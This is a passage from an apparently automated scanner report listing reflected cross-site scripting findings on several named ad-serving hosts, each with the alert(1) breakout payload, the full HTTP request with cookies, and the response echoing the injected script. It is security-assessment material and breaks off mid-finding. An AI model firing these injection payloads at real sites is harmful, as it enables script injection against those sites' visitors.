The value of the esi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aec04'-alert(1)-'1f3d713d9ed was submitted in the esi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=trueaec04'-alert(1)-'1f3d713d9ed&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: DW=30a71fe21309244435; IXAI2685=FTF

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 20311
Date: Tue, 28 Jun 2011 07:00:39 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
cs.AddParam('timeinview',InsightExpress.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=trueaec04'-alert(1)-'1f3d713d9ed&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies
...[SNIP]...

1.264. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34473'-alert(1)-'7d000f7a05e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033&34473'-alert(1)-'7d000f7a05e=1 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: DW=30a71fe21309244435; IXAI2685=FTF

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 20324
Date: Tue, 28 Jun 2011 07:00:53 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
sightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033&34473'-alert(1)-'7d000f7a05e=1'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Typ
...[SNIP]...

1.265. http://core.insightexpressai.com/adServer/GetInvite2.aspx [placementID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the placementID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58db6'-alert(1)-'491378593ce was submitted in the placementID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=6263368858db6'-alert(1)-'491378593ce&creativeID=41684033 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: DW=30a71fe21309244435; IXAI2685=FTF

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 20311
Date: Tue, 28 Jun 2011 07:00:50 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=6263368858db6'-alert(1)-'491378593ce&creativeID=41684033'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,
...[SNIP]...

1.266. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the referer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d4ed'-alert(1)-'0970073923a was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=econintersect.com2d4ed'-alert(1)-'0970073923a&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: DW=30a71fe21309244435; IXAI2685=FTF

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 20339
Date: Tue, 28 Jun 2011 07:00:42 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
alytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178310&referer=econintersect.com2d4ed'-alert(1)-'0970073923a&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightE
...[SNIP]...

1.267. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d44'-alert(1)-'1b14759b523 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel15d44'-alert(1)-'1b14759b523&placementID=62633688&creativeID=41684033 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: DW=30a71fe21309244435; IXAI2685=FTF

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 20311
Date: Tue, 28 Jun 2011 07:00:49 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
00)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel15d44'-alert(1)-'1b14759b523&placementID=62633688&creativeID=41684033'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow
...[SNIP]...

1.268. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9903"%3balert(1)//4a7972a808a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9903";alert(1)//4a7972a808a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=178169&siteID=N884.InvestingChannel&creativeID=41684033&placementID=62633688&d9903"%3balert(1)//4a7972a808a=1 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 623
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAI2685=FTF; domain=.insightexpressai.com; expires=Tue, 28-Jun-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Tue, 28 Jun 2011 07:00:43 GMT
Pragma: no-cache
Date: Tue, 28 Jun 2011 07:00:43 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='function'
...[SNIP]...
('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=62633688&d9903";alert(1)//4a7972a808a=1&creativeID=41684033";document.getElementsByTagName('head')[0].appendChild(s);}})();

1.269. http://d.tradex.openx.com/afr.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb90</script><script>alert(1)</script>fb55665102c was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HEREeeb90</script><script>alert(1)</script>fb55665102c HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932; expires=Wed, 27-Jun-2012 01:23:18 GMT; path=/
Content-Length: 2797
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HEREeeb90</script><script>alert(1)</script>fb55665102c&loc=")', 40000);
// ]]>
...[SNIP]...

1.270. http://d.tradex.openx.com/afr.php [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2918f</script><script>alert(1)</script>80e96401aed was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&loc=2918f</script><script>alert(1)</script>80e96401aed HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932; expires=Wed, 27-Jun-2012 01:24:21 GMT; path=/
Content-Length: 3025
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&loc=2918f</script><script>alert(1)</script>80e96401aed")', 40000);
// ]]>
...[SNIP]...

1.271. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcfdd</script><script>alert(1)</script>395febdf9e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&bcfdd</script><script>alert(1)</script>395febdf9e7=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932; expires=Wed, 27-Jun-2012 01:23:28 GMT; path=/
Content-Length: 2803
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&bcfdd</script><script>alert(1)</script>395febdf9e7=1&loc=")', 40000);
// ]]>
...[SNIP]...

1.272. http://d.tradex.openx.com/afr.php [zoneid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea169</script><script>alert(1)</script>8970e5583f0 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5517ea169</script><script>alert(1)</script>8970e5583f0&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3cb35a7c5f9ca23b321fef18971c2932; expires=Wed, 27-Jun-2012 01:23:01 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517ea169</script><script>alert(1)</script>8970e5583f0&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 40000);
// ]]>
...[SNIP]...

1.273. http://delivery.steelhousemedia.com/serve [advid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the advid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da468"-alert(1)-"0fa78f36b29 was submitted in the advid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297da468"-alert(1)-"0fa78f36b29&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:19 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:19 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297da468"-alert(1)-"0fa78f36b29&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnL
...[SNIP]...

1.274. http://delivery.steelhousemedia.com/serve [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88e68"-alert(1)-"c2ca0ab24f4 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

